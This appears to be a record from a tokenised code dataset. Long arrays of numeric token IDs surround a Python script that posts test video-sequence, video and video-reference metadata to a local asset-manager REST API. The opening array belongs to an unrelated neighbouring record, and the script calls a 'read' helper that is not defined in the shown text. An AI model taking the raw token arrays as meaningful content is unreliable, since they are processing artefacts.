220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
35720,
654,
42248,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
35720,
654,
42248,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
220,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
11813,
278,
12,
8248,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
11813,
278,
12,
8248,
9126,
1435,
19,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
11813,
278,
12,
8248,
9126,
1435,
23,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
11813,
278,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
11813,
278,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
220,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
21170,
5013,
79,
34055,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
10352,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
21170,
5013,
79,
34055,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
7029,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
21170,
5013,
79,
34055,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
2704,
702,
2971,
62,
21170,
5013,
79,
34055,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
7029,
20520,
796,
10352,
628,
220,
1303,
6414,
11,
14725,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
9444,
396,
1387,
9126,
1435,
12,
25101,
12,
25101,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
9444,
396,
1387,
9126,
1435,
12,
25101,
12,
17821,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
9444,
396,
1387,
9126,
1435,
12,
17821,
12,
25101,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
9444,
396,
1387,
9126,
1435,
12,
17821,
12,
17821,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
220,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
75,
17,
62,
41684,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
6407,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
75,
17,
62,
41684,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
75,
17,
62,
41684,
12,
8248,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
6407,
198,
2,
220,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
42557,
62,
75,
17,
62,
41684,
12,
8248,
9126,
1435,
19,
12,
20214,
2167,
20520,
796,
6407,
198,
220,
220,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
361,
16993,
12,
8248,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
361,
16993,
12,
37031,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
361,
16993,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
361,
16993,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
628,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
3919,
259,
2536,
12,
361,
16993,
12,
8248,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
3919,
259,
2536,
12,
361,
16993,
12,
37031,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
3919,
259,
2536,
12,
361,
16993,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
16,
12,
20214,
2167,
20520,
796,
10352,
198,
220,
21231,
62,
1640,
62,
3672,
17816,
40546,
62,
261,
418,
12,
3919,
259,
2536,
12,
361,
16993,
12,
33,
3219,
3123,
1878,
27660,
9126,
1435,
17,
12,
20214,
2167,
20520,
796,
10352,
628,
220,
611,
1438,
287,
21231,
62,
1640,
62,
3672,
25,
198,
220,
220,
220,
611,
21231,
62,
1640,
62,
3672,
58,
3672,
5974,
198,
220,
220,
220,
220,
220,
1441,
705,
17821,
19355,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
1441,
705,
25101,
19355,
198,
220,
2073,
25,
198,
220,
220,
220,
3601,
366,
1136,
62,
30283,
62,
2501,
62,
65,
3258,
62,
40290,
3419,
6439,
329,
366,
1343,
1438,
198,
220,
220,
220,
1441,
1303,
2147,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
220,
30751,
13,
2860,
62,
49140,
10786,
20274,
62,
15908,
82,
3256,
299,
22046,
11639,
10,
6,
1267,
198,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
3919,
12,
489,
1747,
3256,
2244,
11639,
3919,
62,
489,
1747,
3256,
2223,
11639,
8095,
62,
7942,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4277,
28,
25101,
11,
1037,
2625,
5211,
407,
3551,
597,
7110,
12960,
82,
284,
262,
11898,
19570,
198,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
198,
220,
1388,
7,
22046,
13,
20274,
62,
15908,
82,
11,
26498,
13,
3919,
62,
489,
1747,
8,
628,
198,
220,
220,
220,
220,
198
] | 2.23501 | 2,485 |
#!/usr/bin/env python
# This is a script for loading some test data into the video-asset-manager using
# REST calls. Each insert is being done as a separate call, which is the only type of
# insert that the API supports at this point.
#
# Note that for production loads, we would not do this in this manner. Instead, we might
# use a script that takes a few parameters (e.g. file URL, camera_id) then
# - auto-generates some parameters, such as video-sequence name and video name.
# - parses the other metadata from the video file as json, using something like ffprobe
# - maps the json from ffprobe to the asset managers metadata.
# - generates the video-sequence and video objects via API's calls as needed.
import requests
import json
base_url = "http://localhost:8080/v1/"
vs_url = base_url + "videosequence"
v_url = base_url + "video"
vr_url = base_url + "videoreference"
vs1 = read(vs_url,
data = {"name": "T0097",
"camera_id": "Tiburon"})
v1_1 = read(v_url,
data = {"name": "T0097-01",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"]})
vr1_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mov",
"video_uuid": v1_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mp4",
"video_uuid": v1_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
v1_2 = read(v_url,
data = {"name": "T0097-02",
"start": "2016-04-05T00:01:15Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This video is cool"})
vr1_2_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mov",
"video_uuid": v1_2["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_2_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mp4",
"video_uuid":v1_2["uuid"],
"container":"video/mp4",
"video_codec":"H.264",
"audio_codec":"AAC",
"width":1920,
"height":1080,
"frame_rate":19})
v1_3 = read(v_url,
data = {"name": "T0097-01HD",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This is a reference to a tape that overlaps with video files"})
vr1_3_1 = read(vr_url,
data = {"uri": "urn:T0097-01HD",
"video_uuid": v1_3["uuid"],
"width": 1920,
"height": 1080,
"frame_rate": 29.97,
"description": "D5 Tape"})
vs2 = read(vs_url,
data = {"name": "V1234", "camera_id": "Ventana"})
v2_1 = read(v_url,
data = {"name": "V1234-01",
"start": "2016-06-12T00:18:31Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs2["uuid"]})
vr2_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mov",
"video_uuid": v2_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr2_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mp4",
"video_uuid": v2_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 19})
vs3 = read(vs_url,
data = {"name": "V9931", "camera_id": "Ventana"})
v3_1 = read(v_url,
data = {"name": "V9931-01",
"start": "2011-12-12T00:00:10Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs3["uuid"]})
vr3_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mov",
"video_uuid": v3_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr3_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 30})
vr3_1_3 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z_midres.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 720,
"height": 640,
"frame_rate": 19})
print("--- Database Dump -----------------------------------------------------")
db_dump = json.loads(requests.get(v_url).text)
print(json.dumps(db_dump, sort_keys=True, indent=2, separators=(',', ': '))) | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
2,
770,
318,
257,
4226,
329,
11046,
617,
1332,
1366,
656,
262,
2008,
12,
562,
316,
12,
37153,
1262,
198,
2,
30617,
3848,
13,
5501,
7550,
318,
852,
1760,
355,
257,
4553,
869,
11,
543,
318,
262,
691,
2099,
286,
198,
2,
7550,
326,
262,
7824,
6971,
379,
428,
966,
13,
198,
2,
198,
2,
5740,
326,
329,
3227,
15989,
11,
356,
561,
407,
466,
428,
287,
428,
5642,
13,
5455,
11,
356,
1244,
198,
2,
779,
257,
4226,
326,
2753,
257,
1178,
10007,
357,
68,
13,
70,
13,
2393,
10289,
11,
4676,
62,
312,
8,
788,
198,
2,
532,
8295,
12,
8612,
689,
617,
10007,
11,
884,
355,
2008,
12,
43167,
1438,
290,
2008,
1438,
13,
198,
2,
532,
13544,
274,
262,
584,
20150,
422,
262,
2008,
2393,
355,
33918,
11,
1262,
1223,
588,
31246,
1676,
1350,
198,
2,
532,
8739,
262,
33918,
422,
31246,
1676,
1350,
284,
262,
11171,
11663,
20150,
13,
198,
2,
532,
18616,
262,
2008,
12,
43167,
290,
2008,
5563,
2884,
7824,
338,
3848,
355,
2622,
13,
198,
198,
11748,
7007,
198,
11748,
33918,
198,
198,
8692,
62,
6371,
796,
366,
4023,
1378,
36750,
25,
1795,
1795,
14,
85,
16,
30487,
198,
14259,
62,
6371,
796,
2779,
62,
6371,
1343,
366,
85,
485,
577,
421,
594,
1,
198,
85,
62,
6371,
796,
2779,
62,
6371,
1343,
366,
15588,
1,
198,
37020,
62,
6371,
796,
2779,
62,
6371,
1343,
366,
85,
485,
382,
4288,
1,
198,
198,
14259,
16,
796,
1100,
7,
14259,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
51,
405,
5607,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
25695,
62,
312,
1298,
366,
51,
38616,
261,
20662,
8,
198,
85,
16,
62,
16,
796,
1100,
7,
85,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
51,
405,
5607,
12,
486,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
9688,
1298,
366,
5304,
12,
3023,
12,
2713,
51,
405,
25,
486,
25,
405,
57,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
32257,
62,
17805,
271,
1298,
1315,
1635,
3126,
1635,
8576,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
43167,
62,
12303,
312,
1298,
3691,
16,
14692,
12303,
312,
8973,
30072,
198,
37020,
16,
62,
16,
62,
16,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
51,
405,
5607,
62,
1264,
1899,
26598,
51,
18005,
405,
57,
13,
76,
709,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
16,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
24209,
2435,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
2964,
4965,
25112,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
7863,
13,
5607,
30072,
198,
37020,
16,
62,
16,
62,
17,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
51,
405,
5607,
62,
1264,
1899,
26598,
51,
18005,
405,
57,
13,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
16,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
39,
13,
18897,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
7863,
13,
5607,
30072,
198,
198,
85,
16,
62,
17,
796,
1100,
7,
85,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
51,
405,
5607,
12,
2999,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
9688,
1298,
366,
5304,
12,
3023,
12,
2713,
51,
405,
25,
486,
25,
1314,
57,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
32257,
62,
17805,
271,
1298,
1315,
1635,
3126,
1635,
8576,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
43167,
62,
12303,
312,
1298,
3691,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
11213,
1298,
366,
1212,
2008,
318,
3608,
20662,
8,
198,
37020,
16,
62,
17,
62,
16,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
51,
405,
5607,
62,
1264,
1899,
26598,
51,
18005,
1314,
57,
13,
76,
709,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
16,
62,
17,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
24209,
2435,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
2964,
4965,
25112,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
7863,
13,
5607,
30072,
198,
37020,
16,
62,
17,
62,
17,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
51,
405,
5607,
62,
1264,
1899,
26598,
51,
18005,
1314,
57,
13,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
85,
16,
62,
17,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
2404,
15588,
14,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
2404,
39,
13,
18897,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
2404,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
40454,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
24045,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
1129,
30072,
198,
198,
85,
16,
62,
18,
796,
1100,
7,
85,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
51,
405,
5607,
12,
486,
10227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
9688,
1298,
366,
5304,
12,
3023,
12,
2713,
51,
405,
25,
486,
25,
405,
57,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
32257,
62,
17805,
271,
1298,
4153,
1635,
3126,
1635,
8576,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
43167,
62,
12303,
312,
1298,
3691,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
11213,
1298,
366,
1212,
318,
257,
4941,
284,
257,
9154,
326,
12893,
1686,
351,
2008,
3696,
20662,
8,
198,
37020,
16,
62,
18,
62,
16,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
700,
25,
51,
405,
5607,
12,
486,
10227,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
16,
62,
18,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
2808,
13,
5607,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
11213,
1298,
366,
35,
20,
40849,
20662,
8,
628,
198,
198,
14259,
17,
796,
1100,
7,
14259,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
53,
1065,
2682,
1600,
366,
25695,
62,
312,
1298,
366,
53,
298,
2271,
20662,
8,
198,
85,
17,
62,
16,
796,
1100,
7,
85,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
3672,
1298,
366,
53,
1065,
2682,
12,
486,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
9688,
1298,
366,
5304,
12,
3312,
12,
1065,
51,
405,
25,
1507,
25,
3132,
57,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
32257,
62,
17805,
271,
1298,
1315,
1635,
3126,
1635,
8576,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
43167,
62,
12303,
312,
1298,
3691,
17,
14692,
12303,
312,
8973,
30072,
198,
37020,
17,
62,
16,
62,
16,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
53,
1065,
2682,
62,
1264,
33206,
1065,
51,
405,
1507,
3132,
13,
76,
709,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
17,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
24209,
2435,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
19815,
721,
1298,
366,
2964,
4965,
25112,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
24051,
62,
19815,
721,
1298,
366,
32,
2246,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
10394,
1298,
14062,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
17015,
1298,
17729,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
14535,
62,
4873,
1298,
7863,
13,
5607,
30072,
198,
37020,
17,
62,
16,
62,
17,
796,
1100,
7,
37020,
62,
6371,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
19779,
9900,
1298,
366,
4023,
1378,
2503,
13,
2022,
2743,
13,
2398,
14,
21943,
14,
5657,
14,
53,
1065,
2682,
62,
1264,
33206,
1065,
51,
405,
1507,
3132,
13,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
15588,
62,
12303,
312,
1298,
410,
17,
62,
16,
14692,
12303,
312,
33116,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
34924,
1298,
366,
15588,
14,
3149,
19,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
